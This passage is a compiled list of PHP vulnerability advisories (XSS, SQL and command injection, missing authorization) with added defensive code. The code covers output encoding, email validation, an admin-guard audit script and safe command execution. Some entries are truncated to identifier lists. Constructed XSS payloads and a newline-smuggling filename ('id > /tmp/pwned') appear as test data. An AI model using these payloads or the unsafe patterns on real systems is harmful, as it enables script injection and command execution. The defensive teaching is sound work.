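Only the first URL passes. Two things the check relies on that are easy to lose in practice: the HTTP client must connect to `connect_ip` rather than resolve the name again, and it must not follow redirects on its own (each redirect target goes back through `vet_fetch_target`). The advisory's second half, the `.txt` extension defeating image validation, is a separate control: what the fetched bytes are allowed to be is decided after the fetch, and neither check substitutes for the other.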
Source: NVD. Score 5.3; published February 9, 2026; severity MEDIUM; CNA score 5.3. Affected technologies: PHP.
## CVE-2026-34396 (Wiz, CVSS 6.1, MEDIUM): PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo admin panel renders plugin configuration values in HTML forms without applying htmlspecialchars() or any other output encoding. The jsonToFormElements() function in admin/functions.php directly interpolates user-controlled values into textarea contents, option elements, and input attributes. An attacker who can set a plugin configuration value (either as a compromised admin or by chaining with CSRF on admin/save.json.php) can inject arbitrary JavaScript that executes whenever any administrator visits the plugin configuration page. At time of publication, there are no publicly available patches.
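The three sinks the advisory names (textarea contents, option elements, input attributes) each break out differently, and one encoder handles all three if it is applied per value with `ENT_QUOTES`. The block below is an added example, not AVideo code and not its `jsonToFormElements()`: it builds the same kind of form once with raw interpolation and once with encoding, over a constructed configuration. The same pattern is the fix for the stored-XSS entries elsewhere on this page where a name or title field is echoed into admin markup.

```php
<?php
// Added example (not AVideo code). Renders plugin configuration values into
// the three HTML contexts named in the advisory, first without encoding and
// then with htmlspecialchars() applied per value. Configuration is constructed.

function esc(string $s): string
{
    // ENT_QUOTES: encode both quote styles, needed inside attribute values.
    // ENT_SUBSTITUTE: replace invalid UTF-8 instead of returning ''.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** $encode = false reproduces the unsafe interpolation pattern; true is the fix. */
function render_plugin_form(array $config, bool $encode): string
{
    $e = $encode ? 'esc' : fn (string $s): string => $s;
    $html = '';
    foreach ($config as $name => $value) {
        $n = $e((string) $name);
        if (is_array($value)) {                           // option list
            $html .= "<select name=\"$n\">";
            foreach ($value['options'] as $opt) {
                $o = $e((string) $opt);
                $html .= "<option value=\"$o\">$o</option>";
            }
            $html .= '</select>';
        } elseif (strlen((string) $value) > 60) {          // long text
            $html .= "<textarea name=\"$n\">" . $e((string) $value) . '</textarea>';
        } else {                                           // short text
            $html .= "<input type=\"text\" name=\"$n\" value=\"" . $e((string) $value) . '">';
        }
        $html .= "\n";
    }
    return $html;
}

// Constructed attacker-controlled values, one per context
$config = [
    'title'  => '" autofocus onfocus="alert(1)',                               // breaks out of value=""
    'notice' => str_repeat('a', 61) . '</textarea><script>alert(2)</script>',  // closes the textarea
    'mode'   => ['options' => ['fast', '"><script>alert(3)</script>']],       // breaks out of <option>
];

echo "--- unsafe ---\n", render_plugin_form($config, false);
echo "--- encoded ---\n", render_plugin_form($config, true);
```

In the encoded output every `<`, `>` and `"` inside a value appears as an entity, so the markup stays where the template put it. This encoder is for HTML body and attribute contexts only; a value landing inside a `<script>` block, a URL attribute or an inline event handler needs its own encoder. The CSRF chain the advisory mentions on `admin/save.json.php` is a separate control (a request token) and is not addressed by output encoding.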
Source: NVD. Score 6.1; published March 3 (date truncated).
## CVE-2026-26988 (Wiz, CVSS 9.3, CRITICAL): PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below contain an SQL Injection vulnerability in the ajax_table.php endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the address parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation. This issue has been fixed in version 26.2.0.
Source: NVD. Score 9.3; published February 20, 2026; severity CRITICAL; CNA score 9.3.
## CVE-2026-32629 (Wiz, CVSS 5.4, MEDIUM): PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, an unauthenticated attacker can submit a guest FAQ with an email address that is syntactically valid per RFC 5321 (quoted local part) yet contains raw HTML, for example `" "@evil.com`. PHP's `FILTER_VALIDATE_EMAIL` accepts this address as valid. The email is stored in the database without HTML sanitization and later rendered in the admin FAQ editor template using Twig's `|raw` filter, which bypasses auto-escaping entirely. This issue has been patched in version 4.1.1.
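The lesson of this entry is that "valid email" and "safe to echo" are different properties. The block below is an added example, not phpMyFAQ code: it adds a dot-atom gate on top of `FILTER_VALIDATE_EMAIL` so quoted local parts (the RFC 5321 form that can carry `<`, `>` and `"`) are turned away, and it escapes at the rendering point regardless, which is what dropping `|raw` amounts to. All sample addresses are constructed; the quoted-local-part sample is rejected by the gate whatever `FILTER_VALIDATE_EMAIL` decides about it.

```php
<?php
// Added example, not phpMyFAQ code. Two independent controls: a stricter gate
// than FILTER_VALIDATE_EMAIL alone (reject quoted local parts, which RFC 5321
// allows but which can carry '<', '>' and '"'), and HTML escaping at the point
// of rendering, i.e. never |raw for a stored value. Inputs are constructed.

function email_acceptable(string $email): bool
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;                               // syntactically invalid
    }
    $at = strrpos($email, '@');                     // a quoted local part may itself contain '@'
    $local = substr($email, 0, $at);
    // dot-atom only (RFC 5322 atext): no quotes, spaces, '<', '>' or parentheses
    $atom = '[A-Za-z0-9!#$%&\'*+\/=?^_`{|}~-]+';
    return (bool) preg_match("/^{$atom}(?:\\.{$atom})*$/", $local);
}

/** What the admin template should do with a stored address. */
function render_email_cell(string $email): string
{
    return '<td>' . htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

$samples = [
    'user@example.org',
    'first.last+tag@example.org',
    '"<b>bold</b>"@evil.com',       // quoted local part carrying markup
    '"x"@evil.com',
    'user@@example.org',
];
foreach ($samples as $s) {
    printf("%-32s accepted=%s rendered=%s\n", $s, email_acceptable($s) ? 'yes' : 'no', render_email_cell($s));
}
```

The first two samples pass the gate; the quoted forms fail it because the local part must be a dot-atom; the doubled `@` fails `FILTER_VALIDATE_EMAIL` itself. Rendering encodes every sample, accepted or not, which is the control that would have held even if the gate had let the markup through.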
Source: NVD. Score 5.4; published April 2, 2026; severity MEDIUM; CNA score 5.4. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A).
## CVE-2025-67165 (Wiz, CVSS 9.8, CRITICAL): PHP vulnerability analysis and mitigation
An Insecure Direct Object Reference (IDOR) in Pagekit CMS v1.0.18 allows attackers to escalate privileges.
Source: NVD. Score 9.8; published December 17, 2025; severity CRIT; CNA score 9.8. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 24.5; EPSS probability: 0.1. Affected package: pagekit/pagekit (Composer advisory: severity CRITICAL, no fix, added Dec 21, 2025).
## CVE-2025-69212 (Wiz, CVSS 9.4, CRITICAL): PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Source: NVD. Score 9.4; published February 6, 2026; severity CRITICAL; CNA score 9.4. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 30; EPSS probability: 0.1. Affected package: devcode-it/openstamanager.
## CVE-2025-69214 (Wiz, CVSS 8.7, HIGH): PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.
Source: NVD. Score 8.7; published February 6, 2026; severity HIGH; CNA score 8.7. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 2.7; EPSS probability: N/A. Affected package: devcode-it/openstamanager (Composer advisory: severity HIGH, no fix; date added truncated).
## CVE-2026-30880 (Wiz, CVSS 9.2, CRITICAL): PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has an OS command injection vulnerability in the installer. This issue has been patched in version 5.2.3.
Source: NVD. Score 9.2; published March 31, 2026; severity CRITICAL; CNA score 9.2. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 47.3; EPSS probability: 0.2. Affected package: baserproject/basercms (Composer advisory: severity CRITICAL, has fix, added Apr 02, 2026).
## CVE-2026-27196 (Wiz, CVSS 8.1, HIGH): PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Versions 5.73.8 and below, as well as 6.0.0-alpha.1 through 6.3.1, have a stored XSS vulnerability in html fieldtypes which allows authenticated users with field management permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This issue has been fixed in 6.3.2 and 5.73.9.
Source: NVD. Score 4.8; published February 21, 2026; severity MEDIUM; CNA score 8.1. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 1.7; EPSS probability: N/A. Affected package: statamic (name truncated).
## CVE-2026-33172 (Wiz, CVSS 8.7, HIGH): PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, a stored XSS vulnerability in SVG asset reuploads allows authenticated users with asset upload permissions to bypass SVG sanitization and inject malicious JavaScript that executes when the asset is viewed. This has been fixed in 5.73.14 and 6.7.0.
Source: NVD. Score 8.7; published March 20, 2026; severity HIGH; CNA score 8.7. Affected technologies: PHP. Public exploit: No. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 1.2; EPSS probability: N/A. Affected package: statamic/cms (Composer advisory truncated).
## GHSA-wprj-9cvc-5w37 (Wiz): PHP vulnerability analysis and mitigation
## Summary
Only the identifier `list.json.php` survives from this section's text.
## Details
Identifiers surviving from this section: `add.json.php`, `delete.json.php`, `list.json.php`, `index.php`, `User::isAdmin()`, `plugin/PayPalYPT/View/PayPalYPT_log/list.json.php:1-10`, `{"data": , ...}`, `getAll()`, `ObjectYPT`, `SELECT * FROM PayPalYPT_log`.
The admin guard at `plugin/PayPalYPT/View/PayPalYPT_log/add.json.php:13-16`:
```php
// $obj is created earlier in add.json.php; this is lines 13-16 of that file
if (!User::isAdmin()) {
    $obj->msg = "You can't do this";
    die(json_encode($obj));
}
```
Further identifiers from this section: `configuration.php`, `.htaccess`, `plugin/PayPalYPT/Objects/PayPalYPT_log.php`, the fields `agreement_id`, `users_id`, `json`, `recurring_payment_id`, `value`, `token`, and the sibling templates `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php`, `plugin/BTCPayments/View/Btc_payments/list.json.php`, `list.json.php`.
## PoC
Step 1 — Dump
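The CVE-2026-34732 entry earlier on this page, this advisory and the CVE-2026-33685 entry all describe the same shape: one generated endpoint in a plugin directory shipped without the `User::isAdmin()` guard that its siblings have. The block below is an added audit script, not AVideo code: it walks a plugin tree, looks for the endpoint names those entries mention, and reports any whose source never calls `User::isAdmin()` outside a comment. The fixture tree and plugin names are constructed; the check is textual, so it produces candidates for review, not proof.

```php
<?php
// Added audit script, not AVideo code. Walks a plugin tree looking for the
// CreatePlugin-style JSON endpoints and reports those whose source never calls
// User::isAdmin() outside a comment. Textual heuristic: it finds candidates for
// review, not a proof of missing authorization. Fixture tree is constructed.

function endpoints_without_admin_guard(string $root, array $names): array
{
    $missing = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!in_array($file->getFilename(), $names, true)) {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        // Drop comments so a commented-out guard is not mistaken for a live one
        $src = preg_replace('~/\*.*?\*/~s', '', $src);
        $src = preg_replace('~(?:^|(?<=\s))//.*$~m', '', $src);
        if (!preg_match('/\bUser::isAdmin\s*\(/', $src)) {
            $missing[] = substr($file->getPathname(), strlen($root) + 1);
        }
    }
    sort($missing);
    return $missing;
}

// Constructed fixture: two guarded templates, one unguarded, one with the guard commented out
$root = sys_get_temp_dir() . '/guard-audit-' . bin2hex(random_bytes(4));
$view = "$root/plugin/ExamplePlugin/View/Example_log";   // hypothetical plugin
$ads  = "$root/plugin/ExampleAds";                        // hypothetical plugin
mkdir($view, 0700, true);
mkdir($ads, 0700, true);
$guard = "if (!User::isAdmin()) {\n    \$obj->msg = \"You can't do this\";\n    die(json_encode(\$obj));\n}\n";
file_put_contents("$view/add.json.php",    "<?php\n\$obj = new stdClass();\n$guard");
file_put_contents("$view/delete.json.php", "<?php\n\$obj = new stdClass();\n$guard");
file_put_contents("$view/list.json.php",   "<?php\n\$obj = new stdClass();\n\$obj->data = [];\necho json_encode(\$obj);\n");
file_put_contents("$ads/reports.json.php", "<?php\n// if (!User::isAdmin()) { die('{}'); }\necho json_encode([]);\n");

$names = ['list.json.php', 'add.json.php', 'delete.json.php', 'reports.json.php'];
print_r(endpoints_without_admin_guard($root, $names));

// Remove the fixture
$all = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($all as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
```

The script prints the two unguarded paths, `plugin/ExampleAds/reports.json.php` and `plugin/ExamplePlugin/View/Example_log/list.json.php`. Pointed at a real checkout, it is a cheap way to find every template generated from the same source as the one the advisory describes; each hit still needs a human to decide whether a `User::isLogged()`-style check or an include further up the file covers it.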
## CVE-2026-34737 (Wiz, CVSS 6.5, MEDIUM): PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the StripeYPT plugin includes a test.php debug endpoint that is accessible to any logged-in user, not just administrators. This endpoint processes Stripe webhook-style payloads and triggers subscription operations, including cancellation. Due to a bug in the retrieveSubscriptions() method that cancels subscriptions instead of merely retrieving them, any authenticated user can cancel arbitrary Stripe subscriptions by providing a subscription ID. At time of publication, there are no publicly available patches.
Source: NVD. Score 6.5; published March 31, 2026; severity MEDIUM; CNA score 6.5. Affected technologies: PHP. Public exploit: Yes.
## GHSA-g3hp-vvqf-8vw6 (Wiz, CVSS 5.3, MEDIUM): PHP vulnerability analysis and mitigation
## Summary
A stored XSS vulnerability exists in the User Permissions page. The User Group name is rendered without proper HTML escaping in the permissions section, allowing an attacker to execute arbitrary JavaScript when another user views or edits a user's permissions.
This is a separate vulnerability from the previously reported "Stored XSS via User Group Name in User Settings Page" and "Multiple Stored XSS in User Group Edit Page". This affects a different sink: the individual user's permissions page.
## Proof of Concept
Required permissions: admin access; `allowAdminChanges`.
## Steps to Reproduce
Log in to the control panel as an admin
Navigate to Settings → Users → User Groups
Save the user group
## CVE-2026-33649 (Wiz, CVSS 8.1, HIGH): PHP vulnerability analysis and mitigation
Only code identifiers survive from this entry's description: `plugin/Permissions/setPermission.json.php`, `session.cookie_samesite=None`.
Source: NVD. Score 8.8; published March 23, 2026; severity HIGH; CNA score 8.1. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 6.2; EPSS probability: N/A. Affected package: wwbn/avideo (Composer advisory: severity HIGH, no fix, added Mar 26, 2026).
## CVE-2026-33482 (Wiz, CVSS 8.1, HIGH): PHP vulnerability analysis and mitigation
Only code identifiers survive from this entry's description: `sanitizeFFmpegCommand()`, `plugin/API/standAlone/functions.php`, `&&`, `;`, `|`, `` ` ``, `$()`, `sh -c`, `execAsync()`.
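The OpenSTAManager P7M entry earlier on this page describes a filename reaching a system command, and what survives of this entry is a sanitizer name, a list of shell metacharacters and `sh -c`, which is the denylist pattern: strip the separators one can think of, then hand the string to a shell anyway. The block below is an added example, not OpenSTAManager or AVideo code: it runs a constructed hostile filename through a strip-list, through `escapeshellarg()`, and through `proc_open()` with an argv array, and only ever executes `/bin/echo`. It assumes a POSIX system and PHP 7.4 or later.

```php
<?php
// Added example, not OpenSTAManager or AVideo code. An attacker-controlled
// filename (constructed) goes through a strip-list sanitizer, then through
// escapeshellarg(), then to proc_open() with an argv array that never touches
// a shell. Commands are only built as strings or run against /bin/echo, so
// nothing harmful executes. Assumes a POSIX system.

function strip_metachars(string $s): string
{
    // The denylist idea: remove the separators one thinks of. Newline, tab,
    // quotes, braces and $IFS tricks are not on the list and pass through.
    return str_replace(['&&', ';', '|', '`', '$(', ')'], '', $s);
}

function command_after_striplist(string $file): string
{
    return 'openssl smime -verify -noverify -in ' . strip_metachars($file);
}

function command_with_escapeshellarg(string $file): string
{
    return 'openssl smime -verify -noverify -in ' . escapeshellarg($file);
}

/** Runs argv directly (no sh -c) and returns stdout. PHP >= 7.4 accepts an array here. */
function run_argv(array $argv): string
{
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed hostile filename: no ';', '|' or '&&' anywhere, just a newline
$hostile = "report.p7m\nid > /tmp/pwned";

echo "strip-list : ", json_encode(command_after_striplist($hostile)), "\n";
echo "escaped    : ", json_encode(command_with_escapeshellarg($hostile)), "\n";
echo "argv       : ", json_encode(run_argv(['/bin/echo', $hostile])), "\n";
```

`json_encode` makes the newline visible: the strip-list leaves it in the command string, where a shell would treat it as the end of the `openssl` line and the start of a second command; `escapeshellarg` wraps the whole value in single quotes so it stays one argument; the argv form has no shell in the path at all, and `echo` prints the newline as data. The argv form is the one to prefer when the wrapper controls the call; `escapeshellarg` is the fallback when a shell string is unavoidable, and neither is a string-stripping function.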
Source: NVD. Score 8.1; published March 23, 2026; severity HIGH; CNA score 8.1. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 25.7; EPSS probability: 0.1. Affected package: wwbn/avideo (Composer advisory: severity HIGH, no fix, added Mar 21, 2026).
## CVE-2025-61674 (Wiz, CVSS 6.1, MEDIUM): PHP vulnerability analysis and mitigation
October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Global Editor Settings permission could inject malicious HTML/JS into the stylesheet input at Markup Styles. A specially crafted input could break out of the intended context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12.
Source: NVD. Score 4.8; published January 10, 2026; severity MEDIUM; CNA score 6.1. Affected technologies: PHP, Homebrew. Public exploit: No. CISA KEV: No (release date N/A).
## CVE-2026-26991 (Wiz, CVSS 5.1, MEDIUM): PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0.
Source: NVD. Score 5.1; published February 20, 2026; severity MEDIUM; CNA score 5.1. Affected technologies: PHP.
## CVE-2026-24420 (Wiz, CVSS 6.5, MEDIUM): PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below allow an authenticated user without the `dlattachment` permission to download FAQ attachments due to an incomplete permissions check. The presence of a right key is improperly validated as proof of authorization in `attachment.php`. Additionally, the group and user permission logic contains a flawed conditional expression that may allow unauthorized access. This issue has been fixed in version
Source: NVD. Score 6.5; published January 24, 2026; severity MEDIUM; CNA score 6.5. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 2.8.
## CVE-2026-25487 (Wiz, CVSS 6.1, MEDIUM): PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Tax Rates 'Name' field in the Store Management section is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source: NVD. Score 6.1; published February 3, 2026; severity MEDIUM; CNA score 6.1. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A). EPSS percentile: 4.5.
## CVE-2026-34383 (Wiz, CVSS 4.3, MEDIUM): PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Prior to version 5.0.8, the inventory module's item_save endpoint accepts a user-controllable POST parameter imported that, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces. This issue has been patched in version 5.0.8.
Source: NVD. Score 3.5; published March 31, 2026; severity LOW; CNA score 4.3. Affected technologies: PHP. Public exploit: Yes. CISA KEV: No (release date N/A, due date N/A).
Wiz
CVE-2026-33884 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33884 [MEDIUM] CVE-2026-33884 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33884 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated Control Panel user with access to live preview could use a live preview token to access restricted content that the token was not intended for. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 29, 2026
Wiz
CVE-2026-24788 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24788 [HIGH] CVE-2026-24788 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24788 :
PHP vulnerability analysis and mitigation
RaspAP raspap-webgui versions prior to 3.3.6 contain an OS command injection vulnerability. If exploited, an arbitrary OS command may be executed by a user who can log in to the product.
Source : NVD
## 8.7
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
billz/raspap-webgui
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 03, 2026
Wiz
CVE-2026-24417 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24417 [HIGH] CVE-2026-24417 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24417 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-25498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-25498 [HIGH] CVE-2026-25498 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25498 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, a Remote Code Execution (RCE) vulnerability exists in Craft CMS where the assembleLayoutFromPost() function in src/services/Fields.php fails to sanitize user-supplied configuration data before passing it to Craft::createObject(). This allows authenticated administrators to inject malicious Yii2 behavior configurations that execute arbitrary system commands on the server. This vulnerability represents an unpatched variant of the behavior injection vulnerability addressed in CVE-2025-68455, affecting different endpoints through a separate code path. This vulnerability is fixed in 5.8.22.
Source : NVD
Wiz
CVE-2026-25510 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-25510 [CRITICAL] CVE-2026-25510 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25510 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, an authenticated user with file editor permissions can achieve Remote Code Execution (RCE): by chaining the file creation and save endpoints, the attacker can upload and execute arbitrary PHP code on the server. This issue has been patched in version 0.28.5.0.
Source : NVD
## 8.8
Score
Published February 3, 2026
Severity HIGH
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.1
Exploitation Probability (EPSS) 0.1
Wiz
GHSA-654x-9q7r-g966 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-654x-9q7r-g966 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-654x-9q7r-g966 :
PHP vulnerability analysis and mitigation
## Summary
The authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process.
## Vulnerability Details
The password reset flow returns different responses based on whether the provided email address exists in the database or not.
- If the email is registered, the system typically returns a success message (e.g., "Password reset link has been sent").
- If the email is not registered, the system returns an error message (e.g., "User not found" or a different HTTP status code).
This discrepancy allows attackers to programmatically "enumerate" or confirm va
Wiz
CVE-2026-23959 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23959 [MEDIUM] CVE-2026-23959 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23959 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `CustomerTransformerController`
Source : NVD
## 6.9
Score
Published January 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
coreshop/core-shop
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 22, 2026
Wiz
CVE-2026-33548 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33548 [HIGH] CVE-2026-33548 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33548 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `$this->tag_name`
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mantisbt/mantisbt
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
Wiz
CVE-2026-33483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33483 [HIGH] CVE-2026-33483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33483 :
PHP vulnerability analysis and mitigation
Referenced in the advisory: `aVideoEncoderChunk.json.php`, `/tmp/`
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 60.3
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-24415 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-24415 [MEDIUM] CVE-2026-24415 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24415 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contains Reflected XSS vulnerabilities in the invoice/order/contract modification modals. The application fails to sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output: `$_GET['righe']` is echoed directly into an HTML `value` attribute without `htmlspecialchars()` or an equivalent encoder. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.
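The attribute-context sink described here, beside the stored element-context sink of the Craft Commerce entries above (CVE-2026-25487 Tax Rates name, CVE-2026-25484 Product Type name), as an added example. This is not OpenSTAManager or Craft Commerce code; it assumes PHP 8 and uses constructed payloads.

```php
<?php
declare(strict_types=1);

// Added example, not OpenSTAManager or Craft Commerce code (PHP 8). The sink
// is the same in all three entries: a string the user controls is written
// into HTML without encoding. esc() encodes for HTML text and double-quoted
// attribute values; other contexts (JavaScript, URLs, CSS) need their own encoder.

function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Reflected, attribute context (the $_GET['righe'] shape): value echoed raw. */
function renderRowsFieldUnsafe(string $righe): string
{
    return '<input type="text" name="righe" value="' . $righe . '">';
}

/** Same markup, value encoded for the attribute it lands in. */
function renderRowsFieldSafe(string $righe): string
{
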